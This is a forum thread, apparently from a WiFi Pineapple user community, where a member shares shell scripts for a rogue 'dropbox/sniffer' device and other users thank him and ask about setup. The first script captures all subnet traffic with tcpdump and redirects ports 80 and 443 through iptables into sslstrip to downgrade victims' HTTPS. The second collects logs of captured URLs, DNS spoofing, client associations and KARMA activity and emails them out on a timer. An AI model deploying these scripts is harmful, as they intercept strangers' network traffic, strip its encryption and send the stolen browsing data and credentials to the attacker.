telot Posted October 9, 2012 Share Posted October 9, 2012 Good morning everyone! Its been a while since I've contributed, so this is way overdue. I see a lot on new faces on these forums, which is a wonderful thing! I've been jam packed busy, so theres nothing too fun to share at the moment, but hopefully some of you will find these simple scripts useful. They are designed with a dropbox/sniffer application in mind. Sniff all the packets and keep me abreast of whats going on. Enjoy! dumpNstrip.sh (I either run this upon startup or keep it bound to the WPS button for great win) #!/bin/shtcpdump -i eth0 -w /usb/cap.pcap -n net 172.16.42.0/24 &iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000sslstrip -w /usb/sslstrip.log &[/CODE]telots-emailreport.sh (I keep this on a cron job for once every 20 minutes - keeps me up to date on the cap file size, number of "guests", and system stability)[CODE]#!/bin/shTODAY=$(date +"%m-%d-%y")rm /usb/emailreport.logdu -h /usb/cap.$TODAY.pcap > /usb/emailreport.logcat /www/pineapple/logs/associations.log >> /usb/emailreport.logcat /www/pineapple/logs/urlsnarf.log >> /usb/emailreport.log./killurlsnarf.sh./starturlsnarf.shcat /www/pineapple/logs/dnsspoof.log >> /usb/emailreport.logcat /proc/net/arp >> /usb/emailreport.logcat /tmp/dhcp.leases; echo '\n'; cat /proc/net/arp; echo '\n'; grep KARMA /tmp/karma.log | grep -v -e enabled | grep -v -e malloc | grep -v -e CTRL_IFACE | grep -v -e KARMA_STATE | grep -v -e Request >> /usb/emailreport.logssmtp -v EMAIL@DOMAIN.com < /usb/emailreport.log[/CODE]telot Quote Link to comment Share on other sites More sharing options...
Pwnd2Pwnr Posted October 9, 2012 Share Posted October 9, 2012 Very nice... I will go ahead and ctrl+c that... thank you! Quote Link to comment Share on other sites More sharing options...
WatskeBart Posted October 9, 2012 Share Posted October 9, 2012 (edited) Very nice... I will go ahead and ctrl+c that... thank you! Don't forget to change email address, otherwise telot will become crazy with all those logs :P @Telot maybe define email as variable ;) Edited October 9, 2012 by WatskeBart Quote Link to comment Share on other sites More sharing options...
telot Posted October 9, 2012 Author Share Posted October 9, 2012 (edited) @WatskeBart - you figured out my grand plot!! I wanted all the logs! DRINK ALL THE BOOZE - LOG ALL THE THINGS! I'm glad you guys enjoy tho - feel free to post any scripts you can't live without! telot Edited October 9, 2012 by telot Quote Link to comment Share on other sites More sharing options...
Sebkinne Posted October 9, 2012 Share Posted October 9, 2012 @WatskeBart - you figured out my grand plot!! I wanted all the logs! DRINK ALL THE BOOZE - LOG ALL THE THINGS! I'm glad you guys enjoy tho - feel free to post any scripts you can't live without! telot I have changed the email address in your first post to prevent people overlooking it and you indeed getting log files. Also, will prevent spambots ;) Best Regards, Sebkinne Quote Link to comment Share on other sites More sharing options...
zettaquark Posted October 12, 2012 Share Posted October 12, 2012 @Telot... Can you please provide reference for me and the rest of the scripting newbs here about tying the dumpNstrip.sh (or other shell scripts) to the WPS button... (Hope this isn't one of those obvious ones. I have actually looked through the menus and do not see this as an option on ver 2.5.0) R/ Z** Quote Link to comment Share on other sites More sharing options...
zettaquark Posted October 13, 2012 Share Posted October 13, 2012 LMAO... ok never mind.. it was obvious.... there is a module "WPS Button Config" Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.